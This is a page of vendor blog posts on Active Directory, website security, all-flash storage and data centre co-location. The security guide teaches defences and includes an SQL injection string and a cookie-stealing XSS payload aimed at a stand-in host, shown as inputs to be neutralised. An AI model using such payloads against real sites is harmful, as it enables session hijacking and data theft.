Active Directory has found its home as a mission-critical component of the IT infrastructure. As businesses continue to leverage it for its powerful capabilities as a commanding repository, Active Directory is a vital part of enterprise security. Therefore, administrators must be able to control, monitor, administer and protect it with the same degree of discipline currently applied to other high-profile information such as credit card data, customer data and so forth. Because native tools do not enable or support the secure and disciplined administration of Active Directory, businesses must look for solutions that enable its controlled and efficient administration. These solutions help make sure the business information housed in Active Directory is both secure and appropriately serving the needs of the business.

Read More

A blog on Website Security

22nd February 2018
|

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office (ICO) had to take its website down after a warning that hackers were taking control of visitors’ computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not carried out to steal data or deface a website. Instead, sites are hacked to use their servers as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet in an attempt to exploit known website security issues in software. By following the tips below, your website should be able to operate in a safer way and deter hackers and the automated tools they use.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies both to the server operating system and to any software you may be running on your website such as a CMS or forum. When security holes are found in software, hackers are quick to attempt to abuse them. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this – unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues. Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and a security vulnerability in a package you depend upon but pay no attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL, it is easy for attackers to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.
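As a minimal illustration, here is a parameterised query using Python's built-in sqlite3 module; the same placeholder pattern exists in most database drivers and languages.

```python
import sqlite3

# Minimal sketch of a parameterised query. The driver treats the parameter
# purely as data, so it can never rewrite the SQL itself.

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "alice' OR '1'='1"  # a classic injection attempt

# Unsafe: string concatenation would let the input rewrite the query:
#   "SELECT * FROM users WHERE name = '" + user_input + "'"

# Safe: the ? placeholder binds the value as data, not as SQL.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)  # [] - the injection attempt matches nothing
```

The concatenated version would have returned every row; the parameterised version simply looks for a user literally named `alice' OR '1'='1` and finds none.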

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.
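For example, Python's standard library can escape user-generated content before it reaches the page; template engines such as Jinja2 apply the same escaping automatically.

```python
from html import escape

# Sketch of output escaping with the standard library. A malicious comment
# becomes inert text instead of executable script.

comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

safe = escape(comment)
print(safe)
# The angle brackets and quotes are now entity-encoded, so the browser
# renders the comment as text rather than executing it.
```

The same principle applies in every output context: escape at the point where data meets markup, using the escaping rules of that context.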

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example to disallow the running of any scripts not hosted on your domain and to disallow inline JavaScript. Mozilla have an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.
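As an illustration, a CSP header might be assembled like this. The directive values shown are a common starting point, not a universal recommendation, and should be tuned to what your site actually loads.

```python
# Sketch: build a Content-Security-Policy header value and attach it to a
# response's headers. The directives below are an illustrative baseline.

CSP = "; ".join([
    "default-src 'self'",   # only load resources from our own origin
    "script-src 'self'",    # no inline or third-party JavaScript
    "object-src 'none'",    # no plugins
])

def add_security_headers(headers):
    """Attach the CSP header to a dict of response headers."""
    headers["Content-Security-Policy"] = CSP
    return headers

headers = add_security_headers({"Content-Type": "text/html"})
print(headers["Content-Security-Policy"])
```

In a real application the header would be set by your web framework or server configuration rather than a plain dict, but the header value itself is the same.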

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.
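A minimal sketch of this split, keeping the full traceback in the server log while returning only a generic message to the user:

```python
import logging

# Sketch: log the full exception server side; show the user nothing that
# reveals stack traces, SQL, file paths or other internals.

log = logging.getLogger("app")

def handle_request(do_work):
    try:
        return do_work()
    except Exception:
        log.exception("request failed")        # full traceback, server side only
        return "Sorry, something went wrong."  # generic message for the user

result = handle_request(lambda: 1 / 0)
print(result)
```

The administrator still gets everything needed to diagnose the fault from the log, while an attacker probing for verbose errors learns nothing.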

Server side validation

Validation should always be done both on the browser and server side. The browser can catch simple failures, like mandatory fields left empty or text entered into a numbers-only field. These checks can, however, be bypassed, so you should make sure you repeat them, along with deeper validation, on the server side; failing to do so could allow malicious or scripting code to be inserted into the database or cause undesirable results on your website.
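A small sketch of repeating those checks on the server, where a tampered request cannot bypass them; the field rules here are illustrative.

```python
import re

# Sketch of server-side validation. Even if the browser-side checks were
# stripped out of the request, the server still enforces the rules.

def validate(form):
    """Return a list of validation errors (empty means the form is valid)."""
    errors = []
    if not form.get("name", "").strip():
        errors.append("name is required")
    if not re.fullmatch(r"\d+", form.get("quantity", "")):
        errors.append("quantity must be digits only")
    return errors

# A well-formed submission passes:
assert validate({"name": "Alice", "quantity": "3"}) == []

# A tampered request that skipped the browser checks is still caught:
print(validate({"name": "", "quantity": "3; DROP TABLE orders"}))
```

Server-side validation is the authoritative check; browser-side validation exists only to give users faster feedback.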

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords for your server and website admin area, but equally important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and a number, will help to protect their information in the long run. Passwords should always be stored as hashed values, using a one-way hashing algorithm. Using this method means that when you are authenticating users you are only ever comparing hashed values.

In the event of someone hacking in and stealing your passwords, storing them hashed helps with damage limitation, as they cannot be reversed. The best an attacker can do is a dictionary attack or brute force attack, essentially guessing every combination until one matches.
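As an illustrative sketch, Python's standard library provides PBKDF2, a one-way hashing scheme with a per-user salt (which blunts dictionary attacks) and a configurable iteration count (which slows brute force):

```python
import hashlib
import hmac
import os

# Sketch of salted one-way password hashing using the standard library's
# PBKDF2. Only the salt and digest are ever stored, never the password.

def hash_password(password, salt=None, iterations=200_000):
    salt = salt or os.urandom(16)  # unique random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password, salt, digest, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("correct horse battery staple")
```

Dedicated password-hashing libraries such as bcrypt or Argon2 are also widely used where available; the pattern of storing only a salted, slow, one-way hash is the same.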

Thankfully, many CMSs provide user management out of the box with a lot of these website security features built in, although some configuration or extra modules might be required to set a minimum password strength. If you are using .NET then it’s worth using membership providers, as they are very configurable, provide inbuilt website security and include ready-made controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any file uploaded, however innocent it may look, could contain a script that, when executed on your server, completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the mime type to verify that the file is an image, as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size, are not foolproof. Most image formats allow a comment section to be stored, which could contain PHP code that could be executed by the server.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension, as a file with the name image.jpg.php has been known to get through. Some options are to rename the file on upload to ensure the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files. This way, any files uploaded to your website are stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. Image tags support an src attribute that is not a direct URL to an image, so your src attribute can point to your file delivery script providing you set the correct content type in the HTTP header.
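Combining the advice above, a hypothetical upload handler might rename files to a server-generated name with an allow-listed extension and store them outside the webroot. The directory path and extension list below are assumptions for illustration only.

```python
import os
import uuid

# Hypothetical sketch of two upload controls: discard the user-supplied
# filename in favour of a server-generated one with an allow-listed
# extension, and store the file outside the webroot (path assumed here).

UPLOAD_DIR = "/srv/private-uploads"   # outside the webroot - illustrative path
ALLOWED = {".jpg", ".png", ".gif"}

def store_upload(original_name, data):
    """Validate the real extension, generate a safe name, return it."""
    ext = os.path.splitext(original_name)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("file type not allowed")
    safe_name = f"{uuid.uuid4().hex}{ext}"   # user-supplied name is discarded
    # open(os.path.join(UPLOAD_DIR, safe_name), "wb").write(data)  # actual write
    return safe_name

# Note: 'image.jpg.php' is rejected, because its real extension is .php.
```

Because files never keep the name the user chose and are never reachable by a direct URL, an uploaded script has no path by which the web server would ever execute it.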

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are a few things you will want to check. For example, make sure you have a firewall set up, and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet only use secure transport methods to your server such as SFTP or SSH. Where possible have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world, only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees to users that they’re communicating with the server they should be, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS in delivering it. That of course includes credit card and login pages. A login form will often set a cookie, for example, which is sent with every other request to your site that a logged-in user makes, and is used to authenticate those requests. An attacker stealing this would be able to perfectly imitate a user and take over their login session. To defeat these kinds of attacks, you almost always want to use HTTPS for your entire site.

Website security tools

Once you think you have done all you can, it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing, or pen testing for short. There are many commercial and free products to assist you in this. They work on a similar basis to the scripts hackers use, in that they test all known exploits and attempt to compromise your site using some of the previously mentioned methods such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scanning over 25,000. But it can be difficult to set up and requires an OpenVAS server to be installed, which only runs on *nix. OpenVAS was a fork of Nessus before it became a closed-source commercial product.
  • SecurityHeaders.io is a tool offering a free online check to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further, you can manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here, as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged-in user, then try changing URL parameters such as user id, or cookie values, in an attempt to view details of another user. Another area worth testing is forms: change the POST values to attempt to submit code to perform XSS or to upload a server-side script.

Hopefully these tips will help keep your site and information safe. Thankfully most Content Management Systems have inbuilt website security features, but it is still a good idea to have knowledge of the most common security exploits so you can make sure that you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm

Read More

Why flash storage is so important to the success of hybrid IT infrastructure

9th February 2018
|


IT leaders are facing critical decisions on how best to deploy data centre and cloud resources to enable digital transformation. The advantages of cloud models have been written about by many IT industry commentators, experts and opinion makers. Understandably, cloud computing is fundamental to delivering the agility, cost efficiencies and simplified operations necessary for modern IT workloads and applications at scale. However, the truth is that even in today’s cloud era, IT leaders still need their own IT infrastructure and data centres to make IT work for their business.

At Wanstor, we believe that today and tomorrow’s data centres must support new models for resource pooling, self-service delivery, metering, elastic scalability and automatic chargebacks. They must deliver performance and agility that the business needs. No longer is it good enough to blame legacy IT equipment for standing in the way of business progress. IT departments must make sure they reduce complexity by leveraging technologies and architectures that are simple to deploy and manage. They must achieve levels of automation, orchestration and scalability that are not possible within data centres that operate on their own.

At Wanstor we have been thinking about the future of the data centre. We believe many IT departments are missing the fundamental question when reviewing their existing infrastructure plans, namely:

How does the data storage strategy integrate within existing and future company owned IT infrastructure and public cloud infrastructures?

At Wanstor we believe the answer to the “storage strategy” question can be found in a storage strategy that encompasses all flash and no longer relies on cumbersome disks and tapes. All-flash storage is the single most important change an IT Manager will need to make to successfully build their future hybrid infrastructure model. Without a flexible and scalable all-flash storage architecture the future data centre and hybrid cloud model actually fails. The performance, cost efficiencies, simplicity, agility and scalability the modern IT department will need to successfully serve their business cannot be achieved without all-flash storage as the infrastructure foundation.

So how do IT Managers leverage the benefits of all-flash storage to build a service-centric data storage infrastructure required for their business? What are some of the innovations in pricing models and all-flash storage architectures that will help them create a cost-efficient, scalable, resilient and reliable hybrid IT infrastructure?

The first thing IT Managers need to recognise is that moving to all-flash storage for a truly hybrid IT infrastructure is not simply a matter of taking an extra step and buying some more kit, nor is it a case of ripping everything out and starting all over again. Instead it is an iterative process that will take place over a period of time, depending on how mature a business’s IT infrastructure model is at the moment and what needs to be delivered by IT for business success in the future.

Migrating applications onto all flash storage

If you are an IT decision maker, you realise that your business has probably spent quite a bit of budget and a significant amount of effort to make sure business critical applications are supported by an underlying IT infrastructure that is reliable, robust and resilient. Indeed, you are probably beginning to experience performance challenges with a range of applications, particularly those that require high levels of IOPS. But applications and workloads that might see incremental improvements through faster, more responsive storage are unlikely to be the first place where IT will deploy all-flash systems. Instead, the IT Manager is likely to have specific applications and workloads where the performance challenges of spinning disk storage are difficult to overcome, and where the underlying storage infrastructure needs to be modernised to avoid putting the business at risk. Typical applications and workloads at this stage include databases supporting online transaction processing solutions for e-commerce, infrastructures supporting DevOps teams, and industry-specific applications which require levels of performance that traditional disk storage simply cannot deliver.

To understand which applications should be moved to all-flash storage first, it is important to do three things:

Understand the businesses own requirements for data storage, applications and budget considerations, and identify those workloads that are causing the most pain or providing the best opportunity to use all-flash storage to drive measurable business improvements.

Evaluate the benefits of all-flash storage solutions and how they can be applied to enhance and strengthen particular applications and workloads.

Compare leading all-flash solutions and determine which features, functions and pricing models will maximize the IT department’s ability to modernise workloads and begin a journey to an IT infrastructure model based around flash storage.

When evaluating the benefits of all flash storage, Wanstor believes IT Managers should consider the following critical factors:

Performance – All-flash storage will deliver performance that is at least 10 times greater than that of traditional disks. When thinking about performance, do not focus solely on IOPS; it is also about consistent performance at low latency. Make sure an all flash architecture is deployed that delivers consistent performance across all workloads and I/O sizes, particularly if starting with multiple workloads.

Total Cost of Ownership – The price of flash storage has come down dramatically in the past 12 months. If the IT and finance teams looked at flash several years ago and were scared off by the price, it is time to explore flash storage again. In fact some all flash storage providers have prices as low as £1k per TB of data.

Smaller storage footprint – This will happen through inline de-duplication and compression, along with thin provisioning, space-efficient snapshots and clones. In some cases the storage footprint can be reduced by a ratio of 5:1, depending upon the application and workload.

Lower operational overheads – Through faster, simpler deployments, provisioning and scaling, and cost savings as less manual maintenance is required.

Availability and resiliency – All-flash arrays utilise a stateless controller architecture that separates the I/O processing plane from the persistent data storage plane. This architecture provides high availability (greater than 99.999%) and non-disruptive operations. The IT Manager can update hardware and software and expand capacity without reconfiguring applications, hosts or I/O networks, and without disrupting applications or sacrificing performance.

Simpler IT operations – Many all-flash arrays are now plug and play, so simple that in many cases they can be installed in less than an hour. Additionally, storage administrators do not have to worry about configuration tuning and tweaking, saving hours or days of effort and the associated expenses.

Consolidation – The next stage of moving more applications to flash storage

Once you have put your first applications on an all-flash storage array, the improvements in performance should be enough for the IT and finance teams to decide to invest further in the technology and really accelerate their journey to a flash storage based IT infrastructure.

Most IT leaders will want to expand the benefits they have seen from the initial deployment of flash storage to additional applications and workloads across the data centre. As the all-flash storage solution expands to additional applications, IT Managers will find that TCO benefits increase substantially. Because all-flash storage supports mixed workloads, IT Managers will be able to consolidate more applications on fewer devices, thus reducing IT infrastructure capital expenditure. By consolidating, IT Managers will also be able to maximize many of the cost savings mentioned earlier in this article (lower energy consumption, less floor space use, reduced software licensing fees etc).

In dense mixed-workload applications, the TCO of a flash storage solution will typically be 50% to 70% lower than that of a comparably configured traditional disk solution. Beyond the specific cost savings, the performance gains across more applications will drive significant business improvements and new opportunities, resulting in a more agile IT infrastructure.

Additionally, the right all-flash storage architecture will help future-proof storage infrastructure, so that the investments being made today will continue to provide value as all flash storage usage is expanded across the business.

Building a business ready cloud on all flash storage

What do IT departments want and need from their cloud infrastructures? How can they leverage the cost savings and agility of the public cloud model, and link it to the control, security, data protection and peace of mind which can be achieved with an on-premises cloud infrastructure?

From Wanstor’s recent experience, many IT Managers want it all when it comes to cloud computing. They want to be able to provide all the features, functions and flexibility available from the leading public cloud service providers within their own IT infrastructure constraints. For many IT departments, deploying cloud models similar to those of the big 3 cloud providers in a private cloud environment is simply unrealistic, as the big 3 public cloud operators have far greater cash, resources and availability in terms of their infrastructure platforms.

If the IT department is unable to provide a better alternative to a public cloud solution, it is highly likely users within a business will feel the need to go to the public cloud. This creates a fertile ground for shadow IT initiatives that can cause security problems and other risks.

Beyond delivering public cloud-like features and functionality for an IT infrastructure solution, the IT department may also want to improve in areas where the public cloud may fall short. Performance is an example of this – If you want to use cloud services to support high-performance computing or big data analytics or some of the other important next-generation IT initiatives, it is likely the IT team will have to pay a premium to a public cloud service provider to match the businesses requirements.

Security is another critical area where building your own cloud infrastructure will give the IT department much greater control and peace of mind, particularly as they begin thinking about supporting the most important business applications and data in the cloud. As the IT department moves from the first all-flash applications through consolidation and toward the all flash cloud, an important step will be to bridge the virtualization gap between servers and the rest of the IT infrastructure, namely storage and networking.

To deliver a basic cloud-type service based on a flash storage platform, IT’s list of wants must include:

Shared resources through automated processes – Users should be able to go straight to an on-premises cloud and choose the storage capacity and performance they need, for as long as they need it.

Automated metering and charging – Once users have chosen the resources they want, the cloud infrastructure should be able to meter their usage and create an automated chargeback mechanism so they pay for what they actually used.

Scalability – Once resources are used, they go back into the pool and become available to other users and departments. As storage capacity and performance requirements grow, the storage platform should be simple to upgrade, update and scale. With virtualization across servers, storage and networking, an all-flash storage array becomes the foundation for a cloud infrastructure.

In this article we have discussed all-flash storage and the foundation it provides for a truly hybrid IT infrastructure. Without the benefits of all-flash storage, businesses will not be able to modernise their infrastructures to deliver cloud services. It is no coincidence that the largest cloud providers rely on all-flash storage solutions as their storage foundation. As discussed, you can take the journey in stages, starting small with an application or two, and then adding more applications through consolidation and virtualization. You can also implement multiple stages at once. Or you can do everything at once with all-flash storage solutions.

At Wanstor we believe the time for flash storage is now. The technology is mature and at a price point where most businesses will see a return on their storage investment within 12 months, thanks to the improved performance across their business operations.

For more information about flash storage and how Wanstor can help your business with its IT infrastructure strategy and storage platforms, please visit https://www.wanstor.com/data-centre-storage-business.htm


Is your data centre under capacity and cost pressures? A co-location strategy may provide the answer

25th January 2018

For many businesses, the data centre is critical to successful day-to-day operation. But data centres are under pressure: not only from the volume of data they must store and process, but also from rising power costs, new environmental responsibilities, rapidly evolving data centre technologies, and the escalating costs of security, cooling, connectivity, management and maintenance. This means that when a business reaches capacity in its data centre, the IT department can no longer simply ask finance for the funds to build another one. Instead they need to explore other options, and it usually comes down to a choice of two: retrofit the existing data centre or switch to a co-location provider.

At Wanstor we understand that for many businesses there are a number of 'non-negotiables' when it comes to the performance of their data centres.

Maintaining stable, secure power – Evolving technologies and changing service requirements affect power and cooling demands, and today's data centre energy costs are substantial. At Wanstor we have seen some customers spending upwards of 70% of their operational costs just to keep an existing data centre running smoothly. Finding a way to control those costs is often a significant driver for moving to hosted data centre solutions.

Redundancy and reliability – Most data centres have backup power options in case of outages (a UPS and a diesel generator). Many businesses spend a lot of time upgrading these assets each year to keep them in line with their data centre's changing power requirements.

Keeping data safe – At Wanstor we believe data can be used in a variety of ways to transform a business, but how it is stored, managed and maintained brings another side to it – RISK. Privacy has to be protected. Confidential information must be safeguarded. Industry compliance requirements and UK and EU regulations must be met. IT Managers need to know whether their company's data is stored on UK soil. Additionally, the constant stream of new developments in IT and physical security, driven by the continued evolution of security threats, means many IT Managers are not confident their own data centres and systems are as secure as possible.

Growth vs cost – Expand too quickly or too far and the IT Manager risks wasting resources; limit growth and they risk inhibiting the business's potential. Building a brand-new data centre gives the IT Manager the flexibility to customise a build for their business. However, the advantages of a newly built data centre are usually wiped out when the finance team sees the high construction costs involved, the difficulty of selecting the right build partner and the lack of appropriate locations. Indeed, so much is expected of modern data centres that only large enterprises appear to be building them in today's market. This is backed by Forrester Research, which estimates co-location is 37% less expensive than building your own data centre, based on costs over a 15-year period. For many small and medium sized companies, then, the only real solution when they run out of data centre space is to outsource to a co-location provider.
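
A quick back-of-envelope calculation shows how the Forrester figure plays out. The build costs below are hypothetical placeholders; only the 37% saving over 15 years comes from the research quoted above.

```python
# Back-of-envelope build vs co-locate comparison over 15 years.
# The capex and opex figures are invented examples; the 37% saving
# is the Forrester estimate cited in the text.

YEARS = 15
build_capex = 6_000_000          # one-off construction cost (assumed)
build_opex_per_year = 700_000    # power, cooling, staff, maintenance (assumed)

build_total = build_capex + build_opex_per_year * YEARS
colo_total = build_total * (1 - 0.37)   # Forrester: colo ~37% cheaper

print(f"Build: £{build_total:,}  Co-locate: £{colo_total:,.0f}")
```

Even with generous assumptions on the build side, the gap compounds over the contract lifetime, which is why the finance team so often settles the debate.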

Is hosting the right choice for your business?

For many small and medium sized businesses, moving to a hosted data centre model can be an effective way of offsetting the challenges of operating and maintaining their own data centre. At Wanstor we believe IT Managers should work through the questions below before deciding whether a hosting solution is the right choice for their business; the answers should give a relatively quick view on insourcing versus outsourcing their data centres:

What are you looking to achieve with your data centre operations?

  • Address increasing power and cooling requirements?
  • Maximise uptime, availability and redundancy?
  • Keep technology up to date in an ever changing world?
  • Strengthen physical and data security?
  • Increase capacity whilst reducing power costs?
  • Investigate ways to optimise operational performance across systems and people?
  • Make sure IT teams are focussed on core business offerings?
  • Improve the efficiency and effectiveness of IT resource management and support?
  • Create a predictable cost model?
  • Reduce operational complexity and risk?

By defining what IT and the business want to achieve with a new data centre, IT Managers can then scope the solution their business needs. Quite often, once financial metrics are applied to the outcomes, IT Managers conclude that outsourcing to a co-location provider is around a third cheaper than building a new data centre themselves, and in the majority of cases the decision will be made to outsource.

Once the decision to outsource data centre operations to a co-location provider has been made, it is important for the IT Manager to take the time to understand the key characteristics of a dependable co-location data centre. At Wanstor we believe when evaluating a provider’s facilities, IT Managers need to take a close look at the data centre’s capabilities, strengths and potential weaknesses.

From our extensive experience at Wanstor we believe important questions to ask a potential co-location provider include:

What tier ranking is the facility designed to meet? Does your business really need a Tier 4 facility (which costs significantly more) or will a Tier 3 data centre suffice?

What is your downtime tolerance level, and can the facility meet your business's uptime needs? Remember downtime affects your business in terms of revenue, customer experience and brand image.

What security measures are in place? As hosted data centres serve multiple customers, advanced security features should be in place, including 24/7/365 on-site security, network security (intrusion detection, virtualized firewalls and load balancers) and the ability to monitor lines for traffic. At Wanstor we always recommend that IT Managers take the time to discover how much control a provider has over the network that will deliver hosted data centre services. It is also wise to ask about managed protection against DDoS attacks, event management and any other security services essential to your business.

Scalability – What are the options? As a business grows it will need more data centre space and scalable capacity, and any hosted facility chosen should be able to adopt new technologies quickly. Cloud services and fully managed virtualized environments offer many businesses an opportunity to enhance scalability and refocus key IT resources on revenue-generating activities. You may not need these services today, but hosting your data is usually a long-term decision because moving is expensive and risky. IT Managers therefore need to think beyond the initial contract term and make sure they have room to grow, plus some allowance for future needs.

Auditing – When transferring data and applications to a data centre, the IT department is also transferring compliance responsibilities. The IT Manager should therefore check that their data centre provider holds the relevant compliance certifications and ask for proof of them.

Power consumption model – Service reliability will depend on a co-location provider’s ability to measure, monitor and allocate power usage. In an over-subscription power allocation model, a single reading is used for the entire data centre. Unused power from one customer can be resold to another and spikes in power demand from other customers can drain your resources. In the power reservation model, you get the total capacity you’ve paid for, whether or not you use it. You’ll always have enough energy to run your systems, and close monitoring ensures the provider can quickly detect and respond to any increases in your demand. This prevents the situation where one customer has the ability to affect another customer’s environment.
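
The difference between the two models can be sketched in a few lines. In the figures below (all hypothetical, in kW), three customers each reserve 300 kW; under over-subscription only the facility-wide total matters, so one customer's spike drains the shared headroom, whereas under reservation each allocation is ring-fenced.

```python
# Sketch contrasting the two power allocation models described above.
# Capacities and draws are hypothetical example figures in kW.

FACILITY_KW = 1000

def oversubscribed_headroom(actual_draws_kw):
    """Over-subscription: a single facility-wide reading, so a spike
    from any one customer eats into everyone's shared headroom."""
    return FACILITY_KW - sum(actual_draws_kw)

def reserved_headroom(reservations_kw):
    """Reservation: each customer's capacity is ring-fenced up front,
    so headroom is fixed regardless of what anyone actually draws."""
    return FACILITY_KW - sum(reservations_kw)

reservations = [300, 300, 300]
draws = [120, 150, 680]   # customer 3 spikes well beyond its fair share

print(oversubscribed_headroom(draws))   # shared pool nearly drained
print(reserved_headroom(reservations))  # unaffected by the spike
```

In the reservation model the spiking customer would simply be capped at its 300 kW allocation, which is exactly the isolation the paragraph above describes.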

What environmental initiatives are included? Integrated sustainable energy technology is good for both operational cost savings and the environment. Take time to consider the co-location provider's environmental track record, and look for advances such as virtualized environments, free cooling solutions and heat exchangers; all of these can be reliable, cost-effective alternatives to traditional technologies. Many service providers today aspire to improve their power usage effectiveness (PUE), an industry measure of energy efficiency, and a provider with a good PUE will also help keep power costs down.
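
PUE is simply the ratio of total facility energy to the energy delivered to IT equipment, with 1.0 as the theoretical ideal. The figures below are hypothetical examples.

```python
# PUE (power usage effectiveness) as referenced above: total facility
# energy divided by IT equipment energy. Example figures are hypothetical.

def pue(total_facility_kwh, it_equipment_kwh):
    return total_facility_kwh / it_equipment_kwh

# A facility drawing 1500 kWh to deliver 1000 kWh of IT load has PUE 1.5;
# free cooling and heat exchangers shrink the non-IT share of the total.
print(pue(1500, 1000))
```

A provider quoting a PUE closer to 1.2 than 1.5 is spending proportionally less on cooling and overhead, which feeds directly into the power costs passed on to customers.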

Connectivity – The network linking a provider's data centres is a critical component of their offering. Data centres typically process large volumes of traffic, and the network connecting the data centres to each other and to the business needs to sustain those volumes reliably and securely at all times. The physical location of data centres also matters: providers often space out their facilities to minimise the risk of mass disruption, but many data centre applications are sensitive to latency, and the further your data needs to travel, the more likely delay becomes an issue. Evaluating a co-location provider's connectivity performance and options is therefore crucial.

Beyond the characteristics of the data centre itself, the IT Manager will also want to be confident in a provider’s ability to meet business needs. Other questions the IT Manager should be asking alongside exploring the key areas above include:

What kind of network does the provider operate? How does the network cope with spikes in demand? What are the latency levels for different applications?

What kind of service-level agreements (SLAs) are offered? Are the hosting and connectivity service levels aligned and through the same provider? If they are not aligned this could spell trouble, as one service may perform better than the other, leaving a range of performance issues.

Are professional services available to help with understanding technology options/upgrades? One size does not fit all. The right data centre provider will assess your needs, current capabilities and future plans, and will work with you to find a solution that meets your unique business goals.

Can services be scaled quickly and easily? IT needs will certainly continue to evolve, and not always in ways the IT Manager can predict. Look for power and capacity that can be scaled quickly, giving you the energy, space and bandwidth you need to grow your business.

Does the provider offer virtual hosting and cloud solutions? Dedicating a server to each application and configuring it to handle peak loads can be inefficient. Moving your applications to a virtual server farm can help keep costs low and give you the advantage of architectural flexibility. Virtual solutions also scale up quickly and easily, without requiring the IT Manager to invest in any hardware. Look for a provider equipped with the latest virtual service offerings, such as Infrastructure as a Service (IaaS), which gives IT complete control over capacity and charges only for the services used.

Does the provider invest continually in infrastructure and cloud capabilities? One of the benefits of moving to a hosted data centre model is taking advantage of new technology. A good provider will constantly invest in upgrades and advances e.g. by integrating cloud capabilities or adopting the latest innovations in physical and data security.

Are costs predictable? Working with a data centre provider gives you access to a sophisticated infrastructure without incurring significant capital costs. Make sure the monthly costs of the hosted service are stable and predictable, and challenge anything out of the norm, such as unforeseen maintenance requirements.

This article should help IT Managers think about co-location data centre solutions when they are reaching the limits of their own data centre infrastructure. For more information about Wanstor's data centre co-location services, download our brochure here.

Wanstor
124-126 Borough High Street London, SE1 1LB
Phone: 0333 123 0360, 020 7592 7860